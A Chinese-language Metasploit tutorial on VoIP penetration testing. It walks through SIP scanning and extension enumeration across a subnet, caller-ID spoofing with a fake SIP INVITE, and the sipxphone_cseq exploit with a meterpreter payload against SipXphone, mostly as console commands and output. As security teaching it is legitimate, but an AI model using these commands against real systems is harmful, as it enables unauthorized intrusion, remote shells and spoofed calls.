前言
本文简单介绍了使用metasploit对VOIP服务进行渗透测试提权,目标程序SipXphone Version 2.0.6.27
一、对VOIP服务踩点
使用metasploit内置的sip扫描模块进行扫描
msf6 > use auxiliary/scanner/sip/options
msf6 auxiliary(scanner/sip/options) > options
Module options (auxiliary/scanner/sip/options):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5060 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
TO nobody no The destination username to probe at each host
msf6 auxiliary(scanner/sip/options) > set rhosts 192.168.1.1/24
rhosts => 192.168.1.1/24
msf6 auxiliary(scanner/sip/options) > run
[*] Sending SIP UDP OPTIONS requests to 192.168.1.0->192.168.1.255 (256 hosts)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
扫描到voip服务后使用enumerator进行进一步扫描(很遗憾,本人附近没有voip服务)
msf6 > use auxiliary/scanner/sip/enumerator
msf6 auxiliary(scanner/sip/enumerator) > options
Module options (auxiliary/scanner/sip/enumerator):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
CPORT 5060 no The local client port
MAXEXT 9999 yes Ending extension
METHOD REGISTER yes Enumeration method (Accepted: OPTIONS, REGISTER)
MINEXT 0 yes Starting extension
PADLEN 4 yes Cero padding maximum length
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5060 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/sip/enumerator) > set maxext 9999 #分机号码结束地址
maxext => 9999
msf6 auxiliary(scanner/sip/enumerator) > set minext 0 #起始地址
minext => 0
msf6 auxiliary(scanner/sip/enumerator) > set rhosts 192.168.1.1/24
rhosts => 192.168.1.1/24
msf6 auxiliary(scanner/sip/enumerator) > run
二、欺骗性VOIP电话
msf6 > use auxiliary/voip/sip_invite_spoof
msf6 auxiliary(voip/sip_invite_spoof) > options
Module options (auxiliary/voip/sip_invite_spoof):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN no Use a specific SIP domain
EXTENSION no The specific extension or name to target
MSG The Metasploit has you yes The spoofed caller id to send
RPORT 5060 yes The target port (UDP)
SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(voip/sip_invite_spoof) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 auxiliary(voip/sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.106
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
三、对VOIP进行渗透
可以渗透VOIP服务的工具列表
Smap
Sipscan
Sipsak
Voipong
Svmap
本文章假定目标程序为SipXphone Version 2.0.6.27
msf6 > use exploit/windows/sip/sipxphone_cseq
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/sip/sipxphone_cseq) > options
Module options (exploit/windows/sip/sipxphone_cseq):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 5060 yes The target port (UDP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 SIPfoundry sipXphone 2.6.0.27 Universal
msf6 exploit(windows/sip/sipxphone_cseq) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 exploit(windows/sip/sipxphone_cseq) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/sip/sipxphone_cseq) > exploit
[*] Trying target SIPfoundry sipXphone 2.6.0.27 Universal...
[*] Started bind TCP handler against 192.168.1.106:4444
[*] Exploit completed, but no session was created.
因为本人名没有voip服务,所以攻击成功但未创建会话
总结
本文简单介绍了使用metasploit对VOIP服务进行渗透测试提权,因为无实例,所以只能提供方法,仅供学习